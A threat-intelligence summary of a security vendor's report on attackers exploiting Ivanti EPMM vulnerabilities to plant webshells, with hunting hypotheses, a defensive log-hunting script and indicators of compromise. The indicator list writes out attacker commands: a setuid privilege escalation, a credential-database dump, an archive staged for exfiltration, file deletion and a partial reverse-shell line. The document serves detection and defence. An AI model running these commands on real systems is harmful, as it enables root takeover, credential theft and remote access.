
Ivanti EPMM Exploitation: Hit-and-Run

Threat actors are exploiting critical RCE vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti EPMM to deploy AntSword-based webshells. The automated attacks achieve root privilege escalation and rapidly exfiltrate sensitive databases and configuration files containing credentials.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-03-25

Authors: Bert Steppe, WithSecure STINGR

Actors: AntSword

Source: WithSecure


Key Takeaways

  • Threat actors are actively exploiting CVE-2026-1281 and CVE-2026-1340 in Ivanti EPMM to deploy AntSword-based webshells.
  • The attacks are highly automated, completing exploitation and data exfiltration in a matter of seconds.
  • Attackers append a Java-based webshell to the '403.jsp' error page for persistence.
  • Privilege escalation to root is achieved by setting the setuid bit on '/usr/bin/env'.
  • Primary objectives include exfiltrating the 'mifs' database and system configuration files containing credentials.

Affected Systems

  • Ivanti Endpoint Manager Mobile (EPMM)

Vulnerabilities (CVEs)

  • CVE-2026-1281
  • CVE-2026-1340

Attack Chain

Attackers send a crafted HTTP GET request exploiting CVE-2026-1281/CVE-2026-1340 to execute arbitrary commands. They append a base64-encoded AntSword JSP webshell to the '403.jsp' file and set the setuid bit on '/usr/bin/env' for root access. Using the webshell, they load compiled Java classes to perform reconnaissance and execute commands as root. Finally, they dump the 'mifs' database and archive system configuration files, moving them to a web-accessible directory for exfiltration before deleting the staged files.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article provides specific HTTP request patterns, file paths, and command lines for hunting, but does not include ready-to-use detection rules.

Detection Engineering Assessment

  • EDR Visibility: Medium — EDR deployment on proprietary appliances like EPMM may be limited, but if present, process creation events (e.g., mysqldump, tar) spawned by web server processes are highly visible.
  • Network Visibility: High — The initial exploit relies on cleartext HTTP GET requests with distinct URL patterns, and the attack involves outbound reverse shells and data exfiltration over HTTP.
  • Detection Difficulty: Moderate — While the exploit URL patterns are distinct and easy to detect, the payloads are base64-encoded, and the automated nature of the attack leaves a very small window for manual intervention.

Required Log Sources

  • Web Server Access Logs
  • Process Creation Logs
  • File System Monitoring

Hunting Hypotheses

  • Hypothesis: Look for HTTP GET requests containing the exploit patterns '=theValue%20%20' or 'h=gPath%5B%60' in web access logs. | Telemetry: Web Server Access Logs | ATT&CK Stage: Initial Access | FP Risk: Low
  • Hypothesis: Monitor for modifications to the '403.jsp' file in the '/mi/tomcat/webapps/mifs/' directory. | Telemetry: File System Monitoring | ATT&CK Stage: Persistence | FP Risk: Low
  • Hypothesis: Detect web server processes (e.g., Tomcat) spawning 'mysqldump' or 'tar' commands. | Telemetry: Process Creation Logs | ATT&CK Stage: Collection | FP Risk: Medium
  • Hypothesis: Identify the 'chmod +s' command being executed against '/usr/bin/env'. | Telemetry: Process Creation Logs | ATT&CK Stage: Privilege Escalation | FP Risk: Low
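The following is an added hunting example, not code from the WithSecure report or this page: it applies the hypotheses above to constructed sample access-log lines and process-creation events. The web server process names in WEB_PARENTS and the sample telemetry are assumptions, and the URL check is run on both the raw and the percent-decoded request so that case or encoding variants of the same fragment are still caught.

```python
import re
from urllib.parse import unquote

# Constructed sample telemetry (not from the report): Apache-style access
# log lines, and process-creation events as (parent, image, command_line).
ACCESS_LOG = [
    '10.0.0.5 - - [25/Mar/2026:10:01:02 +0000] "GET /mifs/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Mar/2026:10:01:03 +0000] "GET /mifs/x?a=theValue%20%20 HTTP/1.1" 200 88',
    '203.0.113.7 - - [25/Mar/2026:10:01:04 +0000] "GET /mifs/y?h=gPath%5B%60 HTTP/1.1" 200 88',
]
PROCESS_EVENTS = [
    ("java", "/bin/sh", "sh -c chmod +s /usr/bin/env"),
    ("java", "/usr/bin/mysqldump", "mysqldump --databases mifs --tables"),
    ("cron", "/bin/tar", "tar -czvf /var/backups/etc.tgz /etc"),   # benign backup
    ("java", "/bin/tar", "tar -czvf /var/www/ext/html/tmpno /mi/files/system"),
]

# Exploit URL fragments quoted in the report's hunting hypotheses.
EXPLOIT_PATTERNS = ("=theValue%20%20", "h=gPath%5B%60")
# Assumed process names of the EPMM web server (Tomcat runs as a JVM).
WEB_PARENTS = {"java", "tomcat", "catalina"}
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')

def hunt_access_log(lines):
    """Return (client_ip, method, request_target) for each exploit-pattern hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not access-log entries
        ip, method, target = m.groups()
        decoded = unquote(target)         # compare encoded and decoded forms
        if any(p in target or unquote(p) in decoded for p in EXPLOIT_PATTERNS):
            hits.append((ip, method, target))
    return hits

def hunt_process_events(events):
    """Return (stage, command_line) for the behaviours named in the hypotheses."""
    findings = []
    for parent, image, cmdline in events:
        child = image.rsplit("/", 1)[-1]
        if re.search(r"chmod\s+\+s\s+/usr/bin/env", cmdline):
            findings.append(("Privilege Escalation", cmdline))
        elif parent in WEB_PARENTS and child in ("mysqldump", "tar"):
            findings.append(("Collection", cmdline))   # web server spawning dump/archive tools
    return findings

if __name__ == "__main__":
    for hit in hunt_access_log(ACCESS_LOG):
        print("web:", hit)
    for finding in hunt_process_events(PROCESS_EVENTS):
        print("proc:", finding)
```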

Control Gaps

  • Lack of patching for internet-facing appliances
  • Insufficient web application firewall (WAF) rules for zero-day/N-day exploits

Key Behavioral Indicators

  • Webshell appended to 403.jsp
  • Setuid bit on /usr/bin/env
  • mysqldump execution targeting 'mifs' database

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Apply the latest security patches from Ivanti for EPMM immediately.
  • Search web access logs for the provided exploit URL patterns and attacker IPs.
  • Check the integrity of /mi/tomcat/webapps/mifs/403.jsp and /usr/bin/env.

Infrastructure Hardening

  • Restrict internet access to the EPMM administrative interfaces.
  • Deploy a Web Application Firewall (WAF) to filter malicious GET requests.

User Protection

  • Reset all credentials stored in the EPMM database if compromise is suspected.

Security Awareness

  • Ensure rapid response procedures are in place for critical vulnerabilities in internet-facing appliances.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Server Software Component: Web Shell
  • T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1003 - OS Credential Dumping
  • T1560.001 - Archive Collected Data: Archive via Utility
  • T1070.004 - Indicator Removal: File Deletion

Additional IOCs

  • IPs: 11 attacker IP addresses (listed in the WithSecure report)
  • File Paths:
    • /var/www/ext/html/tmp - Staging file for dumped mifs database.
    • /var/www/ext/html/tmpno - Staging archive for system configuration files.
    • /mi/files/system - Target directory containing sensitive configuration files archived by the attacker.
    • /usr/bin/env - System binary modified with setuid bit for privilege escalation.
  • Command Lines:
    • Purpose: Privilege escalation by setting the setuid bit on env binary. | Tools: chmod | Stage: Privilege Escalation | chmod +s /usr/bin/env
    • Purpose: Dumping the EPMM database containing credentials. | Tools: mysqldump | Stage: Collection | mysqldump --databases mifs --tables
    • Purpose: Archiving sensitive system configuration files for exfiltration. | Tools: tar | Stage: Collection | tar -czvf /var/www/ext/html/tmpno /mi/files/system
    • Purpose: Removing staged exfiltration files to cover tracks. | Tools: rm | Stage: Defense Evasion | rm -f /var/www/ext/html/tmp*
    • Purpose: Initiating a reverse shell connection. | Tools: sh | Stage: Execution | /bin/sh -i >& /dev/tcp/